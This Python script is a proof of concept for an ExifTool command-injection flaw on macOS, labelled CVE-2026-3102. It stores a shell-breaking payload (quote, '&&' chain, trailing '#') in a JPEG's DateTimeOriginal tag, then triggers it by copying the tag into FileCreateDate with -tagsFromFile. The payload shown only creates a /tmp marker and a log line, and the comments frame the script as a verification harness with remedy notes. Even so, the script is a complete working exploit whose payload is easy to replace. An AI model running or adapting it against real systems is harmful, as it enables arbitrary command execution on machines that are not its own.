#!/usr/bin/env python3
import subprocess
import tempfile
import os
from datetime import datetime
def run_cmd(cmd):
    """Run *cmd* through the system shell and return its combined output.

    The string is handed to the shell unmodified (``shell=True``), so every
    shell metacharacter in it is interpreted; the callers in this file build
    the string themselves from fixed text plus the PoC payload.

    Returns stdout followed by stderr as one text string. If launching the
    process raises, the exception text is returned instead, so a caller cannot
    tell a failed launch from ordinary tool output by the return type alone.
    The exit status is not inspected.
    """
    try:
        completed = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    except Exception as exc:
        # Best-effort helper: report the failure as text rather than raising.
        return str(exc)
    return completed.stdout + completed.stderr
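# Verification harness for the ExifTool issue this page labels CVE-2026-3102 (macOS).
# Flow: store a crafted DateTimeOriginal value in a throwaway JPEG, copy that value
# into FileCreateDate with -tagsFromFile, then look for the marker file the embedded
# command would create. The embedded command only touches a marker and appends a log line.
# NOTE(review): the quote / "#" wrapping of the value implies the copied tag reaches a
# shell command line when FileCreateDate is set on macOS -- inferred from this PoC,
# confirm against the advisory. The remedy is an ExifTool release that carries the fix
# (<fixed version -- not stated on this page>); until then, avoid copying date tags
# from files of unknown origin into FileCreateDate.
print("[+] ExifTool CVE-2026-3102 PoC (macOS)")

# Create dummy image: JPEG SOI/APP0 marker bytes, a JFIF identifier and zero padding.
with open("poc_test.jpg", "wb") as img:
    img.write(b"\xFF\xD8\xFF\xE0" + b"\x00\x10JFIF" + b"\x00" * 100)

# Name the marker once so the success check below can look for exactly this file
# instead of any "pwned_*" entry that an earlier run left behind in /tmp.
marker_path = f"/tmp/pwned_{int(datetime.now().timestamp())}"
log_path = "/tmp/exiftool_poc.log"
payload = f"touch {marker_path} && echo 'EXPLOITED at {datetime.now()}' >> {log_path}"

print("[+] Writing malicious metadata...")
# Inside the double quotes the outer shell treats the value as plain text, so this
# step only stores the string in the tag; nothing from the payload runs here.
run_cmd(f'exiftool -n -DateTimeOriginal="2024:01:01 12:00:00\' && {payload} #" poc_test.jpg')

print("[+] Triggering vulnerability via -tagsFromFile...")
run_cmd('exiftool -n -tagsFromFile poc_test.jpg "-FileCreateDate<DateTimeOriginal" poc_test.jpg')

# Check for this run's marker only; a prefix match over /tmp reports success on
# stale files from previous runs even when the installed ExifTool is fixed.
if os.path.exists(marker_path):
    print("✅ EXPLOIT SUCCESSFUL!")
    print("Pwned files:", [os.path.basename(marker_path)])
    # The log is written by the same command as the marker, but guard the read so a
    # missing or unreadable log does not abort before cleanup.
    if os.path.exists(log_path):
        with open(log_path, "r") as log:
            print(log.read())
else:
    # A negative result is not proof of a fixed install: a missing exiftool binary
    # or a non-macOS host ends up here as well, because run_cmd's output is discarded.
    print("❌ Exploit did not trigger. Check version and platform.")

# Cleanup: the test image, ExifTool's "_original" backup and this run's marker.
# The append-only log in /tmp is left in place as a record of positive runs.
for leftover in ["poc_test.jpg", "poc_test.jpg_original", marker_path]:
    if os.path.exists(leftover):
        os.remove(leftover)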